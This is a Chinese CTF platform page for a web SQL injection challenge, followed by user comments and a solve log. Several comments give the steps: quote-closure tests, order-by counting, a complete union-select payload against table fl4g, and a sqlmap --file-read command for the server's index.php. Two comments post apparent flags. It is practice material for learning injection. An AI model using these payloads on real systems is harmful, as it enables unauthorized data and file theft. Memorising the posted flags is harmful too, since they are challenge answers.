成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 9635
提  示:
描  述:
来源山科大ctf
评论
x.0.x 6月前

环境有问题

回复 0

docker0w 7月前

1. sqlmap读文件 --file-read=/var/www/html/index.php 2. 通过源代码得知库为:skctf 表为:fl4g 3. dump即可

回复 2

DK. 7月前

这题不错

回复 0

哥哥 8月前

flag{01c89f505e9db1ee17941ad22f53899f}

回复 0

脚本小子admin 9月前

1.判断为字符型,单引号闭合,语句:1' and 1=1 #(正常显示) 和 1' and 1=2 (不显示)# 2.order by 判断数量 3.union 联合注入

回复 1

wugan777 9月前

flag{0ae5f6b4af2192ee4dc59b22f0498715}

回复 0

爱莉希雅 9月前

1' and 1=2 union select 1,2,3,skctf_flag from fl4g# 打出就行

回复 3
fwsw 2月前

@17776194915 练习联合查询注入的,要是为了完成也可以sqlmap跑

回复 0

17776194915 9月前

有流程吗大佬

回复 0

2448556817 10月前

dabudai

回复 0

19219659971 10月前

从fl4g里面导出了flag,但说flag错误?

回复 1

134679852d9e5 10月前

启动环境以后网页打不开啊。啊啊啊啊啊!!!!! 退钱!

回复 4

WriteUp

image
harry

2 金币

评分(21)

解题动态

smileblack 攻破了该题 6小时前
jingraa 攻破了该题 15小时前
13284646828 攻破了该题 17小时前
15040377707 攻破了该题 17小时前
fc221b 攻破了该题 20小时前
luo220 攻破了该题 22小时前
19513396653 攻破了该题 22小时前
良辰 攻破了该题 1天前
wsgg 攻破了该题 1天前
菜薯为什么 攻破了该题 1天前
18356031890 攻破了该题 2天前
llc1219 攻破了该题 2天前
咔咔 攻破了该题 2天前
147258369bugku 攻破了该题 2天前
kfdwty 攻破了该题 2天前
Ta7suya 攻破了该题 3天前
DOMAKE 攻破了该题 3天前
puppetse 攻破了该题 3天前
keduolim 攻破了该题 3天前
18075013015 攻破了该题 3天前
问题反馈